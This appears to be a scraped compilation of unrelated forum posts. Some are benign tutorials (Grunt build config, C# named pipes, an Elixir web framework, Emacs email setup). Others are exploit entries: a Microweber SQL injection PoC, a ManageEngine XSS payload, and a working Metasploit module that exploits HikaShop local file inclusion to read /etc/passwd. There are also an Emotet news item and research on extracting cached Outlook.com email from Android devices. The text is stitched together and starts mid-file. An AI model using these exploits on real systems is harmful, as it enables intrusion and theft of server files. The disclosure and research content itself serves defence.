tizen: { files: [ { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'} ] } }, zip: { tizen: { src: 'dist/tizen/*', cwd: 'dist/tizen', dest: 'dist/helloWorld.wgt' } } }); grunt.loadNpmTasks('grunt-typescript'); grunt.loadNpmTasks('grunt-contrib-copy'); grunt.loadNpmTasks('grunt-zip'); // Default task(s). grunt.registerTask('default', ['copy:libs', 'typescript', 'copy:html']); grunt.registerTask('tizen', ['default', 'copy:tizen', 'zip:tizen']); }; Now we can invoke either grunt command without parameters or, if we wish to build Tizen target, grunt with parameter tizen: grunt tizen In next part we will take a look how to tie together additional template engines Jade and Stylus and how to build MVVC application using Knockout.js. Complete project can be downloaded at link above but it's distributed without node_modules folder so it is necessary to run following command from project directory to load dependencies: npm install . Source
-
NamedPipes Source Introduction This article describes a messaging library which can be used to send a message between two .Net applications running on the same network. The library allows a simple string to be sent between a Client and Server application. The library uses Named Pipes in it's internal implementation. For more information on Named Pipes visit the MSDN page. I also used the following Code Project articles as a starting point for developing the library: Inter-Process-Communication-in-NET-Using-Named-Pip Csharp-Async-Named-Pipes Background I recently came across a scenario where I needed to notify an application that an upgrade was waiting to start. I needed a simple mechanism that would allow me to signal the application. Once signalled, the application would safely shutdown, allowing the upgrade to start. I investigated a number of IPC solution before developing this library. I settled for Named Pipes as it was the most light weight method of IPC I could find. Using the code The library is simple to use, there are two main entry points the PipeServer and the PipeClient. The following code snippet is copied from the sample application included in the source code: var pipeServer = new PipeServer("demo", PipeDirection.InOut); pipeServer.MessageReceived += (s, o) => pipeServer.Send(o.Message); pipeServer.Start(); var pipeClient = new PipeClient("demo", PipeDirection.InOut); pipeClient.MessageReceived += (s, o) => Console.WriteLine("Client Received: value: {0}", o.Message); pipeClient.Connect(); The sample application demonstrates using the library to build a simple echo server. The MessageReceived event handler simply echoes any messages received from the client. PipeServer Start The start method calls BeginWaitingForConnection passing a state object. The Start method is overloaded allowing the client to provide a cancellation token. public void Start(CancellationToken token) { if (this.disposed) { throw new ObjectDisposedException(typeof(PipeServer).Name); } var state = new PipeServerState(this.ServerStream, token); this.ServerStream.BeginWaitForConnection(this.ConnectionCallback, state); } Stop The stop method simply calls the Cancel method of the internal CancelllationTokenSource. Calling Cancel sets the IsCancelationRequested property of the token which gracefully terminates the Server. public void Stop() { if (this.disposed) { throw new ObjectDisposedException(typeof(PipeServer).Name); } this.cancellationTokenSource.Cancel(); } Send The send method first converts the provided string to a byte array. The bytes are then written to the stream using the BeginWrite method of the PipeStream. public void Send(string value) { if (this.disposed) { throw new ObjectDisposedException(typeof(PipeClient).Name); } byte[] buffer = Encoding.UTF8.GetBytes(value); this.ServerStream.BeginWrite(buffer, 0, buffer.Length, this.SendCallback, this.ServerStream); } ReadCallback The ReadCallback method is called when data is received on the incoming stream. The received bytes are first read from the stream, decoded back to a string and stored in the state object. If the IsMessageComplete property is set, this indicates that the Client has finished sending the current message. The MessageRecevied event in invoked and the Message buffer is cleared. If the server has not stopped - indicated by the cancellation token - and the client is still connected, the server continues reading data, otherwise the server begins waiting for the next connection. private void ReadCallback(IAsyncResult ar) { var pipeState = (PipeServerState)ar.AsyncState; int received = pipeState.PipeServer.EndRead(ar); string stringData = Encoding.UTF8.GetString(pipeState.Buffer, 0, received); pipeState.Message.Append(stringData); if (pipeState.PipeServer.IsMessageComplete) { this.OnMessageReceived(new MessageReceivedEventArgs(stringData)); pipeState.Message.Clear(); } if (!(this.cancellationToken.IsCancellationRequested || pipeState.ExternalCancellationToken.IsCancellationRequested)) { if (pipeState.PipeServer.IsConnected) { pipeState.PipeServer.BeginRead(pipeState.Buffer, 0, 255, this.ReadCallback, pipeState); } else { pipeState.PipeServer.BeginWaitForConnection(this.ConnectionCallback, pipeState); } } } PipeClient Connect The connect method simply establishes a connection to the PipeServer, and begins readings the first message received from the server. An interesting caveat is that you can only set the ReadMode of the ClientStream once a connection has been established. public void Connect(int timeout = 1000) { if (this.disposed) { throw new ObjectDisposedException(typeof(PipeClient).Name); } this.ClientStream.Connect(timeout); this.ClientStream.ReadMode = PipeTransmissionMode.Message; var clientState = new PipeClientState(this.ClientStream); this.ClientStream.BeginRead( clientState.Buffer, 0, clientState.Buffer.Length, this.ReadCallback, clientState); } Send The send method for the PipeClient is very similar to the PipeServer. The provided string is converted to a byte array and then written to the stream. public void Send(string value) { if (this.disposed) { throw new ObjectDisposedException(typeof(PipeClient).Name); } byte[] buffer = Encoding.UTF8.GetBytes(value); this.ClientStream.BeginWrite(buffer, 0, buffer.Length, this.SendCallback, this.ClientStream); } ReadCallback The ReadCallback method is again similar to the PipeServer.ReadCallback method without the added complication of handling cancellation. private void ReadCallback(IAsyncResult ar) { var pipeState = (PipeClientState)ar.AsyncState; int received = pipeState.PipeClient.EndRead(ar); string stringData = Encoding.UTF8.GetString(pipeState.Buffer, 0, received); pipeState.Message.Append(stringData); if (pipeState.PipeClient.IsMessageComplete) { this.OnMessageReceived(new MessageReceivedEventArgs(pipeState.Message.ToString())); pipeState.Message.Clear(); } if (pipeState.PipeClient.IsConnected) { pipeState.PipeClient.BeginRead(pipeState.Buffer, 0, 255, this.ReadCallback, pipeState); } } Points of Interest NamedPapes vs AnonymousPipes The System.IO.Pipes namespace contains a managed API for both AnonymousPipes and NamedPipes. The MSDN page states the following: Anonymous pipes Named pipes I based the library on Named pipes because I wanted the library to support duplex communication. Also, the parent child model of Anonymous pipes didn't fit with my scenario. PipeTansmissionMode Named pipes offer two transmission modes, Byte mode and Message mode. In Byte mode - messages travel as a continuous stream of bytes between the client and server. In Message mode - the client and the server send and receive data in discrete units. The end of a message is indicated by setting the IsMessageComplete property. In both modes a write on one side will not always result in a same-size read on the other. This means that a client application and a server application do not know how many bytes are being read from or written to a pipe at any given moment. In Byte mode the end of a complete message could be identified by searching for and End-Of-Message marker. This would require defining an application level protocol which would add needless complexity to the library. In message mode the end of a message can be identified by reading the IsMessageComplete property. The IsMessageComplete property is set to true by calling Read or EndRead. Source Code If you would like to view the libraries source code and demo applications the code can be found on my Bit Bucket site. https://bitbucket.org/chrism233/namedpipes The git repository address is as follows: https://chrism233@bitbucket.org/chrism233/namedpipes.git Source
-
# Exploit Title: SQL Injection in Microweber CMS 0.95 # Google Dork: N/A # Date: 12/16/2014 # Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn) # Vendor Homepage: Microweber (https://microweber.com/) # Software Link: https://github.com/microweber/microweber # Version: 0.95 # Tested on: N/A # CVE : CVE-2014-9464 ::PROOF OF CONCEPT:: GET /shop/category:[SQL INJECTION HERE] HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target/shop Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275 Connection: keep-alive ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html - https://www.youtube.com/watch?v=SSE8Xj_-QaQ - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464 ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. Source
-
Security Advisory : Exploit Title: Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS) Google dork : N/A Exploit Author: Blessen Thomas Date : 03-01-2015 Vendor Homepage : Software Link : N/A Version : ADSelfservice Plus version 5.1 Build :5102 , Evaluation version –Trial Tested on : Windows XP SP2 -Host machine ,Windows server 2003 as Active directory CVE-2014-3779 Type of Application : Web application Release mode : Coordinated disclosure Vulnerability Description : It is observed that the Manageengine ADSelfservice Plus is vulnerable to reflected cross site scripting(non-persistent/temporary) cross site scripting attacks in the “name” parameter and the unfiltered input is reflected to the user Proof of concept : Request : POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1 Host: 192.168.163.134:8888 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 161 subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on Parameter affected: name Payload (Exploit Code): "";</script><script>alert(0)</script><" Vulnerable link: 192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription Tools used : Mozilla firefox browser v28.0 , Burp proxy free edition v1.5 ## Workaround ## ---------------- Update to newer Version 5.2 Build 5202 http://www.manageengine.com/products/self-service-password/download.html?btmMenu ## TimeLine ## ---------------------- 13th Apr 2014 : Bug Discovered 15th Apr 2014 : vendor was notified by e-mail 16th Apr 2014 : Vendor response received 13th May 2014 : Vendor acknowledged and released a patch 22nd May 2014 : Mitre Team provided CVE id 03rd Jan 2015 : Public Disclosure Source
-
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HikaShop - LFI poc for authenticated users', 'Description' => %q{ HikaShop 2.3.3 is vulnerable to local file include attack. Authenticated user can read local files from the server. Vulnerability was described on https://twitter.com/HauntITBlog }, 'Author' => [ 'HauntIT Blog', # Discovery / msf module 'http://hauntit.blogspot.com' ], 'License' => MSF_LICENSE, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '03.01.2015')) register_options( [ OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']), OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ), ], self.class) end def check end def fetchMd5(my_string) if my_string =~ /([0-9a-fA-F]{32})/ return $1 end return nil end def exploit # 1st, we will get cookies and token req1 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'administrator','index.php') }) cookies = req1['set-cookie'] if not req1 fail_with("[-] Failed with 1st request") end print_status("[+] Resp code: " + req1.code.to_s) print_good("[+] Cookie(s) : " + cookies) token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/ if req1.body =~ token_pattern token = fetchMd5(req1.body) print_good("[+] Token : "+ token.to_s) else print_status("[-] Token not found") end # now we need to do auth using that token and cookies print_status("[+] 2nd request (post with auth)") auth = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'administrator','index.php'), 'cookie' => cookies, 'vars_post' => { 'username' => datastore['USERNAME'], 'passwd' => datastore['PASSWORD'], 'option' => 'com_login', 'task' => 'login', 'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk', token.to_s => 1 } }) print_good("[+] Code after auth: " + auth.code.to_s) # 3rd step: get + post params to lfi print_status('[+] and now 3rd request...') xpl = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'administrator','index.php'), 'vars_get' => { 'option' => 'com_hikashop', 'ctrl' => 'view', 'task' => 'edit', 'id' => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd' }, 'cookie' => cookies }) if xpl print_good("[+] 3rd response code: " + xpl.code.to_s) print_good("[+] 3rd (full) response body:") print_status(xpl.body) else fail_with("[-] Cannot exploit it :C") end end # exploit end Source
-
A new Spam email campaign making the rounds in Germany are delivering a new variant of a powerful banking malware, a financial threat designed to steal users’ online banking credentials, according to security researchers from Microsoft. The malware, identified as Emotet, was first spotted last June by security vendors at Trend Micro. The most standout features of Emotet is its network sniffing ability, which enables it to capture data sent over secured HTTPS connections by hooking into eight network APIs, according to Trend Micro. Microsoft has been monitoring a new variant of Emotet banking malware, Trojan:Win32/Emotet.C, since November last year. This new variant was sent out as part of a spam email campaign that peaked in November. Emotet has been distributed through spam messages, which either contain a link to a website hosting the malware or a PDF document icon that is actually the malware. HeungSoo Kang of Microsoft’s Malware Protection Center identified a sample of the spam email message that was written in German, including a link to a compromised website. This indicates that the campaign primarily targeted mostly German-language speakers and banking websites. The spam messages are written in such a way that it easily gain the attention of potential victims. It could masquerade as some sort of fraudulent claim, such as a phone bill, an invoice from a bank or a message from PayPal. Once it infect a system, Emotet downloads a configuration file which contains a list of banks and services it is designed to steal credentials from, and also downloads a file that intercepts and logs network traffic. Network sniffing is especially a disturbing part of this malware because in that a cyber criminal becomes omniscient to all information being exchanged over the network. In short, users can go about with their online banking without even realizing that their data is being stolen. Emotet will pull credentials from a variety of email programs, including versions of Microsoft’s Outlook, Mozilla’s Thunderbird and instant messaging programs such as Yahoo Messenger and Windows Live Messenger. Spam emails containing Emotet malware are difficult for email servers to filter because the messages actually originate from legitimate email accounts. Therefore, typical anti-spam techniques, such as callback verification, won't be applicable on it. However, there is one technique to stop these spam messages — just reject all those messages that come from bogus accounts by checking whether the account from which you have received the spam email really exists or not. Users are also advised not to open or click on links and attachments that are provided in any suspicious email, but if the message is from your banking institution and of concern to you, then confirm it twice before proceeding. Source
-
In November of 2013 our research team spent some time reverse engineering popular mobile applications to get some practice reversing interesting apps. After reviewing these types of apps we noticed a trend that some messaging apps did not take any steps to ensure confidentiality of their locally stored messages. In light of similar issues having recently been deemed a concern on other platforms we thought we'd publish one of our examples to increase user awareness of such behaviors. The application we're discussing here is Outlook.com free email service's mobile client offered by Microsoft. This app is described as being created by Seven Networks in conjunction or in association with Microsoft (i.e. looks like it was outsourced.) The app allows users to access their Outlook.com email on Android devices. In the course of our research we found that the on-device email storage doesn't really make any effort to ensure confidentiality of messages and attachments within the phone filesystem itself. After notifying Microsoft (vendor notification timeline is found at the end of this post) they disagreed that our concern was a direct responsibility of their software, in light of similar problems with iOS being deemed a concern by privacy advocates we thought it'd be a good idea to share what we see with the Outlook.com app. Root Cause: A Common Problem with the Privacy of Mobile Messaging Messaging Apps We feel a key security and privacy attribute of any mobile messaging application is the ability to maintain the confidentiality of data stored on the device the app runs on. If a device is stolen or compromised, a 3rd party may try to obtain access to locally cached messages (in this case emails and attachments). We've found that many messaging applications (stored email or IM/chat apps) store their messages in a way that makes it easy for rogue apps or 3rd parties with physical access to the mobile device to obtain access to the messages. This may be counter to a common user expectation that entering a PIN to "protect" their application would also protect the confidentiality of their messages. At the very least app vendors can warn a user and suggest that they encrypt the file system as the application provides no assurance of confidentiality. Or take it the next level and proactively work with the user to encrypto filesystems at installation time. The Outlook.com Mobile App Behaviors We've found the following two behaviors of the app: The email attachments are stored in a file system area that is accessible to any application or to 3rd parties who have physical access to the phone. The emails themselves are stored on the app-specific filesystem, and the "Pincode" feature of the Outlook.com app only protects the Graphical User Interface, it does nothing to ensure the confidentiality of messages on the filesystem of the mobile device. We feel users should be aware of cases like this as they often expect that their phone's emails are "protected" when using mobile messaging applications. Recommendations to Users We recommend the setting Settings => Developer Options => USB debugging be turned OFF. We further recommend using Full Disk Encryption for Android and SDcard file systems. This would prevent a 3rd party from getting access to any data in plain-text, from a messaging app or other apps that may choose to store private data on the SDCard. Users may change the email attachments download directory, via Settings->general->Attachments Settings->Attachment Folder. It is advised not to set the download directory for attachments to be /sdcard/external_sd, as this will place email attachments on the removable SDCard (if one is in place). For the tech and security folks reading this post, we'll now dive into how we investigated these software behaviors...... Behavior #1: Attachments are placed in a possibly world-readable folder. Outlook.com for Android downloads email attachments to the SDcard partition by default. For almost all versions of Android this places the attachments in a world-readable folder. This would place downloaded email attachments in a storage area accessible to any user or application which can access the SDcard (e.g any app granted READ_EXTERNAL_STORAGE permission) - even if the phone was not rooted. A 3rd party would simply use ADB shell in order to find the attachments, which are located in /sdcard/attachments: The attachments can then be pulled from the device using ADB. Bas Bosschert in his post shows how files from the SDcard may be uploaded to a server. Hence using a similar technique a rogue application needs only the READ_EXTERNAL_STORAGE and INTERNET permissions to exfiltrate data from the SDcard to the Internet, these permissions are some of the most common permissions granted by users to applications upon installation. Users of the latest Android 4.4 or later devices would not see this behavior as having security/privacy ramifications since the SDcard partition is not world readable on Android 4.4 and above. However note that Android 4.4 was released on October 31, 2013 and at the time of this writing a large market share of devices are not running this latest version of Android OS. Behavior #2: Pincode does not protect/encrypt downloaded emails or attachments. Outlook.com provides a Pincode feature. When activated, users have to enter a code in order to interact with the application (launch it, resume it, etc). This feature is not enabled by default in the application: the user must manually enable this feature. We've found that the Pincode feature does not encrypt the underlying data, it only protects the Graphical User Interface, and we feel this is a behavior users should be aware of. This is something that a lot of people reading this blog might think is obvious, but we surveyed a couple non-tech users (hi mom!) and found that the expectation of privacy for the Pincode feature was present. Meaning the user expected that the Pincode would "...protect the whole thing, including the emails" -Mom. After 10 wrong pincode attempts the app will delete the account: The Pincode functionality is located in the com.seven.Z7.app.AppLock class. When a Pincode is created it is passed to AppLock.createHashedPassword(). This creates a custom Base64 encoded SHA1 of the passcode which is stored in the preferences cache (in AppLock.saveHashPassword()). Whenever a Pincode is entered to unlock the app, the same custom Base64 encoded SHA1 is applied to the Pincode and then compared to the stored value for the unlock to succeed (method call: AppLock.testMatchExistingPassword(), called from AppLockPasswordEntry.validatePassword()). The Pincode is sufficient to stop a party who only will try to access the outlook client via the phone screen interface. It will not prevent a party who has access to the filesystem on the device via USB (e.g. ADB). If USB Debugging is enabled and the device is rooted a 3rd party would be able to access the cached emails database. The 3rd party would simply have to run ADB shell to navigate to the working directory of the Outlook.com application (which is /data/data/com.outlook.Z7) in order to find the databases folder: A 3rd party could retrieve the email database file from a rooted phone via standard use of the adb utility. Or the backup trick outlined by Sergei Shvetsov would allow access to the app specific filesystem on a non-rooted mobile device by using an adb trick. First the email.db would have to be removed from the phone via adb and then the relevant data could be accessed by a utility such as sqlite3 (this whole thing can be automated to execute instantly) Email bodies are stored in two tables, a plaintext Preview table containing a short snippet of the email, and a html_body table containing the full email including html markup. Extraction of sensitive data is simpler if the sensitive data is in a short email or at the beginning of a long email, since the first few lines of the email will be placed in plain-text in the Preview column. In this example we have pulled out the body of an email from the Preview table in the database. In the example below we read a specific email (email _id #20) instead of dumping out all emails previews. If the email is longer than the Preview will store, this is not a problem, we just have to pull out the email and then read the html with something sane: Email #18 was crafted to contain a large bit of text from wikipedia with credentials added to the end. To read out the entire email spools just remove the WHERE clause from above; the WHERE clause was merely added for brevity. Recommendations for Mobile App Developers A good defensive measure would be to check the mobile device to see if encryption is enabled by calling getSystemServer() to obtain a DevicePolicyManager object, and then query that object with getStorageEncryptionStatus() to check if the device is encrypted with native filesystem encryption. If the device is not encrypted, the application might show a prompt to ask the user if they'd like to apply Full Disk Encryption to both the device and the SDcard or accept the risk of not having encrypted filesystem before storing data in the Outlook.com for Android application. Alternatively; the Outlook.com for Android app could use 3rd party addons (such as SQLcipher) to encrypt the SQLite database in tandem with transmitting the attachments as opaque binary blobs to ensure that the attachments can only be read by the Outlook.com app (perhaps using the JOBB tool). These methods would be useful for older devices (such as devices that run Android 4.0 and earlier) that do not support full disk encryption. Digital Forensics Notes Digital Forensics technicians interested in obtaining the account information for investigations would take note of the following information. The application working directory on the android device is located at: /data/data/com.outlook.Z7 The subdirectories contain the following information: cache/ - contains the various webcaches for content being pulled into webviews. databases/ - contains the database files where the content of messages, emails, and contact lists are kept files/ - log files for the client and the engine lib/ - empty shared_preferences/ - contain xml files which reflect the state of the user options on the client The account email username is kept in the file: /data/data/com.outlook.Z7/shared_prefs/com.outlook.Z7_preferences.xml The username can be found by searching for the string "email_addresses" in that file. The actual human name of the account is stored in the log files located at: /data/data/com.outlook.Z7/files Looking for the string "connector" within the files in that directory will show the name and account information. Technicians should be able to retrieve the emails by rooting the phone and retrieving the file at: /data/data/com.outlook.Z7/databases/email.db Once rooted, attachments can be found in the folder: /sdcard/Attachments/ The default email address may also be found by looking for the string "email_default_from_address" in the file: /data/data/com.outlook.Z7/shared_prefs/com.outlook.Z7_preferences.xml Also note that contacts and messages are also stored in the email.db database which may contain additional proof of a communication between two parties. Lost Feature: Encryption? We discovered the following which may indicate a possible future role for encryption in the Outlook.com app. In order to test the extent of the "in place" encryption infrastructure, we decided to force-enable encryption by changing the value of Z7MetaData.ClientConfig.UseEncryption in the AndroidManifest.xml to true, and then recompiling and reinstalling the Outlook apk. This did trigger encryption in the subject, and html_body columns (the body column is not used) but did not encrypt the preview column in the database: Again, please note this was just an experiment. The encryption isnot enabled in the app, and the encryption feature set may be incomplete. We hope the encryption mechanism scaffolding we see here can be modified and included in a future release. Vendor Coordination Microsoft Security Response Center was notified via encrypted email of these observed behaviors on December 3rd, 2013. The key message in the response received that same day was "...users should not assume data is encrypted by default in any application or operating system unless an explicit promise to that effect has been made." On May 15th 2014 we contacted Microsoft asking for reconsideration of our report and mentioning our plans to publish this research. They re-stated their position: users of the app should not expect encryption of transmitted or stored messages. Version Information Our original research was conducted on the following app version below. Application Label: Outlook.com Process Name: com.outlook.Z7:client Version: 7.8.2.12.49.2176 APK(s): com.outlook.Z7-1.apk (SHA1- 14b76363ebe96954151965676cfc15761650ef7e) com.outlook.Z7-2.apk (SHA1- 41339b21ba5aac7030a9553ee7f341ff6f0a6cf2) We also confirmed that the relevant classes have not changed by doing a hash comparison of the classes in latest app version which was released May 6th 2014 (7.8.2.12.49.5701) Version: 7.8.2.12 Build Number: 28.49.5701.3 Build Date: 2014-05-04 com.outlook.Z7-1.apk (SHA1 4ee3dc145f199357540a14e0f2ea7b8eb346401e) Source
-
Weber - High Performance web framework for ElixirLang
Aerosol posted a topic in Tutoriale in engleza
Weber - is a open souce weber framework for Elixir programming language. It's very lightweight and easy to deploy. Main goal of Weber to help developers to develop scalable web applications in the usual rails-like style. Weber is in eary development stage now, first commit was 07.09.2013, but now it has many features like: Project generation Json parsing/generation Websockets Sessions i18n [experimental] Grunt.js integraion HTML helpers and many more many features are in plans or in progress now like code reloading and etc... Architecture I started Weber as a hobby project and main point for was - to make high performace web framework. There are many optimizations in weber in different places, more details you can find in the previous post. Weber's workflow is easy. Web server gets request from user and pass it to the handler. Handler tried to parse and match request url and execute any action which dependes on request: Routing All weber's routing configuration is in route.ex file. There is: route marcros in Weber. Main goal of router is to connect URLs with controllers and actions. You no need to declare route macros in your project for configuring routing. It's already predefined after new project creation. Example of routing configuration: route on("GET", "/", :Simpletodo.Main, :action) |> on("POST", "/add/:note", :Simpletodo.Main, :add) You can see here that weber's router consist from route macros and on/4 clauses. Every on/4 gets four parameters which means what to response for certain url. "GET" - HTTP method. Can be "GET","POST","PUT", "DELETE", "PATCH", "ANY" "/" - url :SimpleTodo.Main - controller :add - action So if weber gets "/" request, it will call :SimpleTodo.Main.add, will get response of it and will return user. Weber router supports different features: Regular expression in path: route on("ANY", %r{/hello/([\w]+)}, :Simpletodo.Main, :action) Controller/Action declaration with '#': route on("GET", "/", "Simpletodo.Main#action") Redirect: route redirect("GET", "/redirect", "/weber") Resource routing route resource(:Controller.Work) Will generate: route on("GET", "/controller/work/:id", :Controller.Work, :show) |> on("POST", "/controller/work/:id/create", :Controller.Work, :create) |> on("GET", "/controller/work/:id/edit, :Controller.Work, :edit) |> on("PUT", "/controller/work/:id/update, :Controller.Work, :update) |> on("DELETE", "/controller/work/:id/delete, :Controller.Work, :delete) Controllers Main Unit in Weber is a controller. Every controller consists from action. Controller is a ussual Elixir module and Action is a ussual Elixir function with two parameters. For example: defmodule Simpletodo.Main do def action(_, conn) do {:render, [project: "simpleTodo"], []} end def add([body: body], conn) do {:json, [response: "ok"], [{"Content-Type", "application/json"}]} end end Action parameters: bindings - url bindings. If you have a route path: /add/:name, you will get here: [name: name] connection - Plug record (connection info) Every action must return one of predefined tuple. It can be: {:render, [project: "simpleTodo"], [{"HttpHeaderName", "HttpHeaderValheaderVal"}]} - Renders views from views/controller/action.html and sends it to response. Or without headers. {:render, [project: "simpleTodo"]} {:render_inline, "foo <%= bar %>", [bar: "baz"]}} - Renders inline template. {:render_other, Elixir.Views.Index, [foo: "foo"], []} - Renders any view in controller. Or without headers. {:file, path, headers} - Sends file in response. Or without headers {:file, path} {:json, [response: "ok"], [{"HttpHeaderName", "HttpHeaderValheaderVal"}]} - Weber converts keyword to json and sends it to response. Or without headers: {:json, [response: "ok"]} {:redirect, "/main"} - Redirects to other resource. {:text, data, headers} - Sends plain text. Or without headers: {:text, data} {:nothing, ["Cache-Control", "no-cache"]} - Sends empty response with status 200 and headers. Every action can have own view. So if you have routing something like this: route on ("ANY", "/", :MyProject.Main, :index) And action: def index(_, _) do {:render, []} end Weber will render lib/views/main/index.html view. Templates Weber use EEx templates. It's like HAML in rails: <!DOCTYPE HTML> <html> <head> <title>Simplechat</title> </head> <body> <span>Hello, <%= @project %></span> </body> </html> There are many HTML EEx helpers in the Weber: Weber.Helper.Html - build html from Elixir content_for - layout helper include_view - include html part to the another html Resource helper - script/css/audio/video... Models Weber has no opportunity to use/build data models, instead you can use Ecto library. Ecto is a domain specific language for writing queries and interacting with databases in Elixir. See examples. Benchmark As i said above i tried and trying now to make weber high perfomance. I found table of comparing json transfering, here is my table with the same test: Platform Req/s 1000 NodeJS 27 Plain cowboy 32 ChicagoBoss 7.2 Zotonic 7.5 Weber 16.8 Links Weber at github - Weber weber-contrib - weber-contrib Source -
AdBlock Premium - i think no need to explain what is this, block it, block it; Clear Cache Shortcut - Very simple and useful extension, clear browser cache in one click; CSSViewer - CSSViewer is a simple CSS property viewer for Google chrome originally made by Nicolas Huon as a FireFox addon; goo.gl URL Shortener extension - url shortener right in your browser; Hangout Chat Notifications - get notifiations from google hangout in your browser; Octotree - if you're using github, i really should try this browser extensions to display GitHub code in tree format; Speed Dial - fast access to favorite web resources, it was last thing that prompted me to move from opera to chrome; Twitter for Chrome - i think no need to explain what is this ; Web Developer - the Web Developer extension adds various web developer tools to a browser. Very good and useful extension, many tools in one place; Google Docs - Google docs in browser. Source
-
I'm using Emacs every day, almost for all, in fact i need only two user-level applications at my computer, they are Emacs and web browser (despite on eww in Emacs 25). I use Emacs almost for all, for text editing, for chatting in irc, email reading/writing, files manipulations, as my TODO list and many many more (and this blog post was written in Emacs too). Today i want to tell how to use Emacs for email handling. I will show how to install mu4e and offlineimap and configure Eemacs for handling emails from multiply accounts with this tools in ubuntu-14.10. If you're interesting read next. Installing Emacs Of course first of all you must have installed Emacs on your computer. You can download it from here and build it from source. Or you just can use apt-get package manager and install Emacs with: sudo apt-get install Emacs mu4e mu4e it is a emacs-based e-mail client. You can install it with following commands: sudo apt-get install html2text xdg-utils libgmime-2.6-dev libxapian-dev git clone https://github.com/djcb/mu cd mu && autoreconf -i && ./configure && make sudo make install After these commands execution mu and mu4e should be installed. offlineimap OfflineIMAP is a Python utility to sync mail from IMAP servers. We can install it with: sudo apt-get install offlineimap offlineimap configuration After we have installed all software, we can start to configurate it. Let's start from offlineimap configuration. As i wrote about this post will be about multiply accounts configuration, I personally have two email accounts for work and personal. Let's call it Work and Personal. For offlineimap configuration open/create ~/.offlineimaprc file. Offlineimap configuration file consists from sections and key value records separated with = symbol. Let's add first section to ~/.offlieimaprc: [general] accounts = Work, Personal maxsyncaccounts = 3 First sectrion is general. It contains two values: first is 'accounts', we declare names for our accounts. Second is 'maxsyncaccounts', it controls how many accounts may be synced simultaneously. Next we'll define sections for first 'Work' account: [Repository WorkLocal] type = Maildir localfolders = ~/Maildir/Work [Repository WorkRemote] remotehost = host remoteuser = user@email.com remotepass = password type = IMAP ssl = yes sslcacertfile = /etc/ssl/certs/ca-certificates.crt holdconnectionopen = true keepalive = 120 realdelete = yes There are 3 sections for remote and local repository. First [Account Work] defines local and remote repository. Second section defines type of mail directory, it is a Maildir and path to it. Third section defines remote host parameters as user email, user host, protocol type (IMAP), ssl 